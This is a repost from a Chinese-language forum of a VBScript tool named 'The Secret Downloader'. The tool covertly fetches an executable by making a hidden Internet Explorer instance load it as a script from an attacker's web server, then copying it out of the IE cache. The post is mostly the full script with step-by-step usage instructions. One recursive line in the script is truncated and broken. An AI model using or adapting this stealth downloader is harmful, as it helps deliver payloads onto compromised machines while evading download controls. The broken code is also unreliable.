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标题: [转贴] 使用VBS脚本下载文件 [打印本页]

作者: VBScript    时间: 2012-4-28 17:41     标题: 使用VBS脚本下载文件

为了让IE把我们的exe文件下载到本地缓存,我们需要有一个网页把exe文件包含进去。比如:<script src="520.exe"></script>。这样当IE访问该页面的时候就会把520.exe当成js脚本保存到本地缓存了。保存的命名一般是520[1].exe,IE临时文件的位置可以从注册表键值 HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\paths\Directory 中读取。
  1. '=============================
  2. ' get.vbs
  3. ' by lake2
  4. '=============================
  5. If WScript.Arguments.Count <> 3 Then
  6. WScript.Echo ""
  7. WScript.Echo "======= The Secret Downloader 0.1 ================"
  8. WScript.Echo " by lake2 "
  9. WScript.Echo "Usage: CScript /nologo" & WScript.ScriptName & " [URL] [RemoteName] [LocalFile]"
  10. WScript.Echo "Example: CScript /nologo" & WScript.ScriptName & " [url][/url] 520.exe c:\520.exe"
  11. WScript.Echo "=================================================="
  12. WScript.Quit
  13. End If
  14. URL = WScript.Arguments(0)
  15. exeName = WScript.Arguments(1)
  16. If InStr(exeName, ".") > 0 Then
  17. tmp = Left(exeName,InStrRev(exeName, ".")-1)
  18. tmp2 = Right(exeName,Len(exeName) - InStrRev(exeName, ".") + 1)
  19. FindFileName = tmp & "[1]" & tmp2
  20. End If
  21. LocalName = WScript.Arguments(2)
  22. set ie=wscript.createobject("internetexplorer.application")
  23. ie.visible = 0
  24. ie.navigate URL
  25. WScript.Echo "[+]Create and Exec IE to your HTTP Server ..."
  26. WScript.Sleep(5000)
  27. ie.quit
  28. WScript.Echo "[+]Get the file ..."
  29. set objshell= WScript.Createobject("WScript.Shell")
  30. strValue = objshell.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\paths\Directory")
  31. ShowAllFile(strValue)
  32. WScript.Echo "[-]download Fail :("
  33. Sub ShowAllFile(Path)
  34. Set FSO = CreateObject("Scripting.FileSystemObject")
  35. Set f = FSO.GetFolder(Path)
  36. Set fc = f.SubFolders
  37. For Each f1 in fc
  38. If FSO.FileExists(path&"\"&"\"&FindFileName) Then
  39. FSO.CopyFile path&"\"&"\"&FindFileName, LocalName
  40. WScript.Echo "[+]Download Success !"
  41. WScript.Quit
  42. End If
  43. ShowAllFile path&"\"&
  44. Next
  45. Set FSO = Nothing
  46. End Sub

1、在你的web目录放上一个htm文件,内容包含要下载的文件。如:<script src=520.exe></script>
2、CScript get.vbs 第一步的网页URL 网页包含的文件名 本地保存路径

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